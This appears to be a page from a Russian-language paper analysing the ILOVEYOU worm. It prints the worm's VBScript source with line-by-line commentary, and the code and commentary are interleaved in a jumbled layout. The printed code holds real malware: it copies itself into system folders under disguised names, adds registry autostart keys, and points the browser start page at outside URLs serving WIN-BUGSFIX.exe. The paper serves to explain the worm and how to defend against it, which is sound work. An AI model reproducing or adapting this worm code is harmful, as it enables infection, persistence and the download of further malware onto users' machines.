Интернет – червь I LOVE YOU (LOVE LETTER FOR YOU). Принцип работы. Меры безопасности для защиты от заражения и предотвращения деструктивных действий — страница 7

  • Просмотров 3476
  • Скачиваний 269
  • Размер файла 48
    Кб

сделан вывод о филиппинском про- On Error Resume Next исхождении вируса [1] dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") Подготавливается окружение для работы вируса. [2] set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll Читается основной файл вируса [3] main() Запускается главная процедура sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") Если установлен запрет на rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout") обработку скриптов, то if (rr>=1) then изменением ключа в [4] wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" реестре она разрешается. end if Set dirwin = fso.GetSpecialFolder(0) Определяются пути к: каталогу WIN; [5] Set dirsystem = fso.GetSpecialFolder(1) каталогу SYSTEM; Set dirtemp = fso.GetSpecialFolder(2) каталогу TEMP; Set c = fso.GetFile(WScript.ScriptFullName) ; Определяется имя активного файла c.Copy(dirsystem&"\MSKernel32.vbs") ; В каталог SYSTEM копируется копия вируса [6]

c.Copy(dirwin&"\Win32DLL.vbs") ; В каталог WIN копируется копия вируса c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ; В каталог SYSTEM копируется вторая копия вируса regruns() ; Запускается процедура работы с реестром Windows html() ; Запускается процедура работы с HTML файлами spreadtoemail() ; Запускается процедура работы с электронной почтой listadriv() ; Запускается процедура деструктивных действий end sub ====================Процедура работы с реестром WINDOWS================ sub regruns() On Error Resume

Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" Создается ключ в реестре, который будет запускать вирус при загрузке WINDOWS downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") Анализируется расположение каталога if (downread="") then Download Directory и если он не является downread="c:\" корневым каталогом

диска С: , то пере- end if назначается на C:\ [7] if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Проверяется наличие в системном каталоге файла WinFAT32.exe [8] Randomize и при его наличии генерируется случайное число в пределах 1 - 4 num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if В случае наличия в системной директории файла WinFAT32.exe производится прописывание